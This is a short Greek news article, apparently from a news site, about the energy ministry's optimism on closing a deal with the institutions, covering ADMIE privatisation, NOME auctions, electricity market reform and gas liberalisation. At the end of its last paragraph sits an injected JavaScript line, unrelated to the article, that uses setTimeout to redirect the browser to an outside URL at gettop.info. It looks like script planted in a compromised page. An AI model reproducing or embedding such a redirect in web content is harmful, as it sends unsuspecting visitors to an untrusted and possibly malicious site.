ΥΠΕΝ: Κατά 99,9% κλείνει η συμφωνία με τους θεσμούς για την ενέργεια

0
7
Εργαζόμενοι στην εταιρία "Ελληνικός Χρυσός" παίρνουν μέρος σε διαμαρτυρία ενάντια στην αναστολή λειτουργίας της εταιρίας, έξω από το υπουργείο Περιβάλλοντος και Ενέργειας στην Αθήνα Τετάρτη 13 Ιανουαρίου 2016. ΑΠΕ-ΜΠΕ/ΑΠΕ-ΜΠΕ/ΓΙΑΝΝΗΣ ΚΟΛΕΣΙΔΗΣ

 

Αισιόδοξος ότι θα ολοκληρωθεί η διαπραγμάτευση για τα ενεργειακά, σύμφωνα με το χρονοδιάγραμμα, εξέφρασε ανώτατος παράγοντας του υπουργείου Περιβάλλοντος και Ενέργειας λέγοντας ότι»κατά 99,9% θα κλείσουμε».

Προσερχόμενος στο ξενοδοχείο όπου διεξάγονται οι συζητήσεις με τους εκπροσώπους των θεσμών, επεσήμανε ότι δεν υπάρχουν αγκάθια στη διαπραγμάτευση.

Τα θέματα που συζητώνται περιλαμβάνουν την πορεία αποκρατικοποίησης του ΑΔΜΗΕ, τις δημοπρασίες λιγνιτικής και υδροηλεκτρικής ενέργειας (ΝΟΜΕ) που αναμένεται να ξεκινήσουν τον Οκτώβριο, το νομοσχέδιο για την αναδιοργάνωση της αγοράς ηλεκτρισμού που τέθηκε χθες σε δημόσια διαβούλευση, την υπογραφή συμβάσεων μεταξύ ΔΕΗ και μεγάλων πελατών, την απελευθέρωση της αγοράς φυσικού αερίου και το πλαίσιο στήριξης των ανανεώσιμων πηγών ενέργειας.

Σε ερώτηση αναφορικά με τις αποκρατικοποιήσεις και το ταμείο αξιοποίησης δημόσιας περιουσίας επεσήμανε ότι αξιοποίηση δεν σημαίνει πώληση, σημείωσε ότι η στρατηγική των ΔΕΚΟ που θα ενταχθούν στο υπερταμείο θα εξακολουθήσει να χαράσσεται από το εκάστοτε εποπτεύον υπουργείο ενώ παρέπεμψε στις σχετικές δηλώσεις του πρωθυπουργού στη ΔΕΘ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here